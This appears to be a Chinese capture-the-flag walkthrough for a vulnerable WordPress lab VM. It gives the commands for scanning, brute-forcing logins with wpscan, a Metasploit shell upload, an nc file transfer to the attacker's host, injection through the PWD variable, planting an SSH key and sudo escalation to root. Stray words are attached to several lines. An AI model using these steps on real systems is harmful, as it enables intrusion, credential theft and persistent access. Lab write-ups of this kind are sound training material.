首先 nmap 掃描端口javascript
nmap -p- -A 192.168.149.179php
有個 ftp 能夠匿名登陸html
下下來看一下java
去掃一下python
http://192.168.149.179:65535/nginx
掃出來一個 phpcmsweb
這裏有個驗證密碼才能看的,用以前 ftp 保存下來的密碼試一下shell
wpscan --url http://192.168.149.179:65535/phpcms/ --enumerate
收集一下用戶名bash
wpscan --url http://192.168.149.179:65535/phpcms/ -U user.txt -P pass.txt
爆破一下帳號密碼微信
Username: maybeadmin
Password: $EPid%J2L9LufO5
而後登陸後臺看一下,能夠找到另外一組帳號密碼
notadmin:Pa$$w0rd13!&
而後用 msf 鏈接一下
exploit/unix/webapp/wp_admin_shell_upload
設置如下參數
notadmin
Pa$$w0rd13!&
192.168.149.179
65535
/phpcms
python3 -c 'import pty; pty.spawn("/bin/bash")'
在 /home/doe目錄下有一個 itseasy 文件,執行會返回當前路徑
wsl:nc -lvp 10001 >itseasy
靶機:nc 192.168.149.1 10001 <itseasy
把這個文件給弄出來,IDA 打開看一下
C 庫函數 char *getenv(const char *name) 搜索 name 所指向的環境字符串,並返回相關的值給字符串,在這裏就是 PWD 所指向的,咱們能夠改一下,從而得到一個 shell
其實是請求了 PWD(一個 web 靶機,用上了 IDA 我是沒想到的)
export PWD=\$\(/bin/bash\)
而後再執行那個文件就能拿到 john 用戶的 shell
如今有個問題是 ls,cat 之類的是不回顯的,因此考慮一下把 ssh 的 authorized_keys 寫成 wsl 的公鑰,用 ssh 登上去(john 用戶尚未 .ssh 文件夾,新建一個)
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCyab46KTnUD6PBqNHweAB+SfDl36waT1RpkBUB3rcmP7QhRk4EOh0yShEmGCA2fev/A/9BY2LP2nd4EplGNYn14OgHONtXH74fSCqf0QZGMexQ9BkV5pHOTW+nGapxeaUTzyEkQQvDLnLm05Oqx6F9d5pfHIrbfQLBK7J0zY1BpkflT3I8pBzEdzLCWoG4Z62WGKQ0Q0ldm9NkRoEbZSOUxneazHiVa89mORtdtHXRr3nseLOyN17rJh6c2CF8ZtlLHIp12GOl0A6qm0eFW4KSJJvZCdxhX/p83hfCclFw7dckX1n+Q45GjuUF/ZE8IXmKRkwNDxOZalSgFjyYX+RlMr95Ruv8IaMk8tv5+Ut04cquKUgCn/9ksLRyL7+fJFok1EEupo4ZjTx3DlBNdkSch3IPT1XVgZeapqUik7jt5DgeGmGKBF93kE9pLO+2+3l1KntdeZ3abJHXDWzX6/mqRNtvMzdVik0jQGOjnGz1Yck0z9w8BK8BGtZ+917Kvns= 1097179511@qq.com" > authorized_keys
登陸成功,舒服了
另外他還藏了個密碼,base64解碼以後是:john:YZW$s8Y49IB#ZZJ
這時候 sudo -l 能夠發現有個文件是能夠不須要密碼就能 sudo運行的
文件夾只有 www-data 帳戶能夠寫入,因此仍是要回到 www-data 的 shell,寫個 /bin/sh,而後 sudo 一執行就能拿到 root 權限的 shell
本文分享自微信公衆號 - 陳冠男的遊戲人生(CGN-115)。
若有侵權,請聯繫 support@oschina.cn 刪除。
本文參與「OSC源創計劃」,歡迎正在閱讀的你也加入,一塊兒分享。